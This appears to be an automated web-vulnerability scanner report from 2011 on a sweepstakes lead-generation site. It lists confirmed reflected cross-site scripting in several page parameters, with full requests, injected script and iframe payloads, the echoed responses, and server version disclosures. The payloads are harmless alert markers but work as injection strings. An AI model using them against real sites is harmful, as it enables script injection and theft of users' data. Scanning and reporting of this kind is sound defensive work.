with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script></head><body><p align="center"><strong> Reserving...Please Wait...<br /><br /><img src="http://cdn.findlocaljobsnow.com/images/loading.gif" width="50" height="50" /></strong></p></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?c=3&coreg_10=1&cphone1=3&cphone2=3&cphone3=3&email=netsparker@e..

Parameters

Parameter	Type	Value
c	GET	3
coreg_10	GET	1
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
email	GET	netsparker@example.com
firstname	GET	Ronald Smith
gametester	GET	1
lastname	GET	Ronald Smith
sid	GET	3
subid	GET	'"--></style></script><script>alert(0x0002C9)</script>
tt	GET	0

Request

GET /1-frame.php?c=3&coreg_10=1&cphone1=3&cphone2=3&cphone3=3&email=netsparker@example.com&firstname=Ronald%20Smith&gametester=1&lastname=Ronald%20Smith&sid=3&subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002C9)%3C/script%3E&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7478
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="\'\"--></style></script><script>netsparker(0x0002C9)</script>" /><input name="c" type="hidden" id="c" value="3" /><input name="sid" type="hidden" id="sid" value="3" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /reserving.php

/reserving.php CONFIRMED

http://weekly-prizes.com/reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netspa..

Parameters

Parameter	Type	Value
firstname	GET	Ronald Smith
lastname	GET	Ronald Smith
email	GET	netsparker@example.com
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
subid	GET	154
c	GET	3
sid	GET	'"--></style></script><script>alert(0x0002D2)</script>
tt	GET	0

Request

GET /reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netsparker@example.com&cphone1=3&cphone2=3&cphone3=3&subid=154&c=3&sid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002D2)%3C/script%3E&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php?subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 4122
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Prize...</title><meta http-equiv="Refresh" content="1;URL=http://gtoffers.com/coreg/entry.php?p=xa26g64656&limit=6&exit=1&phone=333&fname=Ronald+Smith&lname=Ronald+Smith&op=http%3A%2F%2Fcdn.weekly-prizes.com%2Fimg%2Fiphoneipad.jpg&sid=154-\\\'\\\"--></style></script><script>netsparker(0x0002D2)</script>-&redirect=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1945%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D154%26pubSubID2%3D154%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002D2%29%3C%2Fscript%3E%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D&exit_url=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1945%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D154%26pubSubID2%3D154%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002D2%29%3C%2Fscript%3E%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D" /><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script></head><body><p align="center"><strong> Reserving...Please Wait...<br /><br /><img src="http://cdn.findlocaljobsnow.com/images/loading.gif" width="50" height="50" /></strong></p></body></html>

- /reserving.php

/reserving.php CONFIRMED

http://weekly-prizes.com/reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netspa..

Parameters

Parameter	Type	Value
firstname	GET	Ronald Smith
lastname	GET	Ronald Smith
email	GET	netsparker@example.com
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
gametester	GET	1
coreg_10	GET	1
subid	GET	154
c	GET	3
sid	GET	'"--></style></script><script>alert(0x0002E9)</script>
tt	GET	0

Request

GET /reserving.php?firstname=Ronald%20Smith&lastname=Ronald%20Smith&email=netsparker@example.com&cphone1=3&cphone2=3&cphone3=3&gametester=1&coreg_10=1&subid=154&c=3&sid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php?subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:22:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 4122
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Prize...</title><meta http-equiv="Refresh" content="1;URL=http://gtoffers.com/coreg/entry.php?p=xa26g64656&limit=6&exit=1&phone=333&fname=Ronald+Smith&lname=Ronald+Smith&op=http%3A%2F%2Fcdn.weekly-prizes.com%2Fimg%2Fiphoneipad.jpg&sid=154-\\\'\\\"--></style></script><script>netsparker(0x0002E9)</script>-&redirect=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1933%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D154%26pubSubID2%3D154%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002E9%29%3C%2Fscript%3E%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D&exit_url=http%3A%2F%2Fian.smileymedia.com%2Fr2%2F%3FplacementID%3Dze-weekly-prizes.com%26email%3Dnetsparker%2540example.com%26fname%3DRonald%2BSmith%26lname%3DRonald%2BSmith%26gender%3DM%26dob%3D1933%26addr%3D%26addr2%3D%26city%3D%26state%3D%26zip%3D%26hphone%3D%26mphone%3D333%26country%3DUS%26pubSubID%3D154%26pubSubID2%3D154%5C%5C%5C%27%5C%5C%5C%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0002E9%29%3C%2Fscript%3E%26destURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D%26exitURL%3Dhttp%253A%252F%252Fweekly-prizes.com%252Fprize.php%253Faff%253D154%2526email%253Dnetsparker%2540example.com%2526c%253D3%2526sgender%253D%255Bgender%255D%2526sdob%253D%255Bdob%255D%2526saddr%253D%255Baddr%255D%2526saddr2%253D%255Baddr2%255D%2526scity%253D%255Bcity%255D%2526sstate%253D%255Bstate%255D%2526shphone%253D%255Bhphone%255D" /><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script></head><body><p align="center"><strong> Reserving...Please Wait...<br /><br /><img src="http://cdn.findlocaljobsnow.com/images/loading.gif" width="50" height="50" /></strong></p></body></html>

- /1.php

/1.php CONFIRMED

http://weekly-prizes.com/1.php?c=us&subid='%3E%3Ciframe%20onload=alert(9)%3E

Parameters

Parameter	Type	Value
c	GET	us
subid	GET	'><iframe onload=alert(9)>

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
Content-Length: 1930
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /img</title> </head> <body><h1>Index of /img</h1><pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/">Parent Directory</a> - <img src="/icons/image2.gif" alt="[IMG]"> <a href="contactinfo.png">contactinfo.png</a> 28-Jan-2011 15:51 2.4K <img src="/icons/image2.gif" alt="[IMG]"> <a href="continue.png">continue.png</a> 16-Feb-2011 22:52 3.2K <img src="/icons/image2.gif" alt="[IMG]"> <a href="favicon.ico">favicon.ico</a> 28-Jan-2011 15:51 894 <img src="/icons/image2.gif" alt="[IMG]"> <a href="iphoneipad.jpg">iphoneipad.jpg</a> 28-Jan-2011 16:36 12K <img src="/icons/image2.gif" alt="[IMG]"> <a href="iphoneipadcombo.jpg">iphoneipadcombo.jpg</a> 28-Jan-2011 16:36 13K <img src="/icons/image2.gif" alt="[IMG]"> <a href="loading.gif">loading.gif</a> 28-Jan-2011 15:51 3.9K <img src="/icons/image2.gif" alt="[IMG]"> <a href="sony.gif">sony.gif</a> 28-Jan-2011 16:36 4.0K <img src="/icons/image2.gif" alt="[IMG]"> <a href="top2.gif">top2.gif</a> 28-Jan-2011 15:51 8.2K <img src="/icons/image2.gif" alt="[IMG]"> <a href="winner2.jpg">winner2.jpg</a> 28-Jan-2011 16:36 7.1K <img src="/icons/image2.gif" alt="[IMG]"> <a href="winner3.jpg">winner3.jpg</a> 28-Jan-2011 16:36 14K <img src="/icons/image2.gif" alt="[IMG]"> <a href="winner4.jpg">winner4.jpg</a> 28-Jan-2011 16:36 11K <hr></pre><address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10 Server at weekly-prizes.com Port 80</address></body></html>

- /privacy.php

/privacy.php

http://weekly-prizes.com/privacy.php

Found E-mails

support@weekly-prizes.com

Request

GET /privacy.php HTTP/1.1
Referer: http://weekly-prizes.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>privacy</title></head><body> <div align="center" style="font-size: 25px;"> <b>Privacy Policy<br /> </b> </div> <p><strong>PRIVACY POLICY — IMPORTANT — PLEASE READ</strong></p> <p>This privacy policy (the "Privacy Policy") discloses the information gathering and dissemination practices for this website. We will notify you of changes to our Privacy Policy by posting the new policy on this website. Review our Privacy Policy regularly so that you can stay informed of our practices, as they may change in the future.<br /> <br /> Please note that you are accepting the terms of this Privacy Policy when you opt-in to this sites Terms and Conditions, when you visit our site, and/or send us information. Your assent to these practices is essential for us to continue operating this website, including the services it provides. Similarly, we need you to provide accurate personal information so that you can be contacted and receive the information you request. You can opt-out and decide not to provide the requested personal information. However, by doing so, you will not receive the information and/or service you are requesting. You can also opt-out after you have sent us your personal information by clicking here to <a href="unsubscribe.php">Unsubscribe</a>.<br /> <br /> The personal information we collect includes your name, mobile phone number, zip code, e-mail address, postal address, date of birth and gender. Other personal information that you submit is clearly labeled at the time you submit it. We use the information that we collect to provide our services, contact you regarding new promotions, and to improve our site. We also use this information—directly, indirectly, and in combination with data we exchange with other parties—to introduce you to informational, service, and/or product offerings of weekly-prizes.com. and/or its subsidiaries, affiliated companies, partners, select unaffiliated companies, assigns, and/or brands that are owned by, licensed by, and/or partnering with weekly-prizes.com (collectively, "Our Companies"). We do this by transferring, licensing, and/or sharing your personal information with Our Companies and hope you will be interested in the marketing materials and/or promotions with which you are presented. Our Companies also transfer, and/or share your personal information with unaffiliated list brokers, affiliate marketers, and/or companies that want to advertise other products and/or services. Once a third-party obtains your personal information, its subsequent use is controlled by the business practices of the third party, which is beyond our control.<br /> <br /> Please note that Our Companies will use the telephone number you submit to contact you by voice and/or text message. By providing your telephone number, you expressly consent to receiving telephone calls and text messages from Our Companies, regardless of whether you have registered the number on the FTC's "Do Not Call" Registry. Expect to receive several calls and/or text messages that follow-up on your initial request. Similarly, by providing your telephone number, you expressly consent to receiving calls from any entity to which we transfer your personal information.<br /> <br /> This website, websites linking to this website, and websites linked from this website (collectively "We") may make available a service either directly or through third parties by which you can receive messages on your wireless device via short message service ("SMS Service"). Your provider's standard data and messaging rates apply to all SMS correspondence. All charges are billed by and payable to your mobile service provider. You represent that you are 18 years of age and the owner or authorized user of the wireless device on which messages will be received, and that you are authorized to approve the applicable charges. Data obtained from you in connection with this SMS Service may include your name, address, cell phone number, your provider's name, and the date, time, and content of your messages. The use of this information will be in accordance with this Mobile Policy. If fees are charged to your wireless account invoice, we may provide your carrier with your applicable information in connection therewith. Your wireless carrier and other service providers may also collect data about your wireless device usage, and their practices are governed by their own policies. You acknowledge and agree that the SMS Service is provided via wireless systems which use radios (and other means) to transmit communications over complex networks. We will not be liable for any delays in the receipt of any SMS messages, as delivery is subject to effective transmission from your network operator. SMS message services are provided on an AS IS basis. We do not guarantee that your use of the SMS Service will be private or secure, and we are not liable to you for any lack of privacy or security you may experience. You are fully responsible for taking precautions and providing security measures best suited for your situation and intended use of the SMS Service. You may opt out of the SMS Service at any time by replying "STOP", "END", or "QUIT" to the SMS text message you have received. This process impacts only the future delivery of the particular SMS message offering, so you must send that message for each offering.<br /> <br /> When submitting any information on our website you expressly authorize Our Companies to use your personal information as explained in this privacy policy, and you consent to receiving commercial email from Our Companies. You can expect to receive offers regarding specific products and/or services, newsletters, sweepstakes announcements, promotions, and other similar offers. Should you wish to discontinue receiving these e-mailings simply unsubscribe using the link in the email you receive.<br /> <br /> We automatically collect certain information from visitors to, the site, such as Internet addresses, browser type, Internet Service Provider (ISP), referring and exit page, operating system, timestamps, and clickstream data. We also track and analyze non-identifying and aggregate usage and volume statistical information from our visitors and customers. This information is logged to help diagnose technical problems, and to administer our site so that we can constantly improve it.<br /> We may also collect any information you send us or post on our site into a file specific to you. We use this information to resolve disputes, troubleshoot problems, and enforce our customer agreements.</p> <p>We take measures to prevent the loss, misuse, and alteration of your information by carefully limiting access to the database in which your personal information is stored. We cannot ensure that all of your private communications and other personally identifiable information will never be disclosed in ways not otherwise described in this Privacy Policy. For example, we may disclose information to the government or third parties under certain circumstances, or third parties may unlawfully intercept or access transmissions or private communications. We can (and you authorize us to) disclose any information about you to law enforcement or other government officials as we, in our sole discretion, believe necessary or appropriate in connection with an investigation of wrongful conduct.<br /> <br /> This website is directed at teenagers and adults and not to children under the age of 13. We do not knowingly collect personally identifiable information from children under the age of 13, nor do we knowingly distribute such information. We do not knowingly allow children under the age of 13 to publicly post or otherwise distribute personally identifiable contact information through our website. Similarly, because we do not collect any personally identifiable information from children under the age of 13, we do not condition the participation of a child under 13 in activities on providing personally identifiable information. If we become aware that we have inadvertently received personally identifiable information from someone under the age of 13, we will delete such information from our records. If we change our practices in the future, we will obtain prior, verifiable parental consent before collecting any personally identifiable information from children under the age of 13.<br /> <br /> Contact us at the address below if you want us to change or delete any information that we have about you. We will respond to your request to access, update, or delete your information within ten (10) business days. Before we are able to provide you with any information, correct any inaccuracies, or delete any information, however, we may ask you to verify your identity.</p> <p>To reach the owner of this website, contact weekly-prizes.com<br /> PO BOX 1283<br /> Riverton, Utah 84065</p> <p>support@weekly-prizes.com<br /> This privacy policy is effective as of May 15th, 2010.</p></body></html>

VULNERABILITIES Vulnerabilities
	IMPORTANT 68 % LOW 21 % INFORMATION 11 %

The DORK Report

XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Total Requests

Average Speed

GHDB, DORK Tests

VULNERABILITIES

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/1-frame.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/1.php CONFIRMED

Parameters

Request

Response

/reserving.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/reserving.php CONFIRMED

Parameters

Request

Response

/1-frame.php CONFIRMED

Parameters

Request

Response

/reserving.php CONFIRMED

Parameters

Request

Response

/reserving.php CONFIRMED

Parameters

Request

Response

/1.php CONFIRMED

Parameters

Request

Response

Apache Version Disclosure

Impact

Remedy

/1.php

Extracted Version

Request

Response

PHP Version Disclosure

Impact

/1.php

Extracted Version

Request

Response

OpenSSL Version Disclosure

Impact

Remedy

/1.php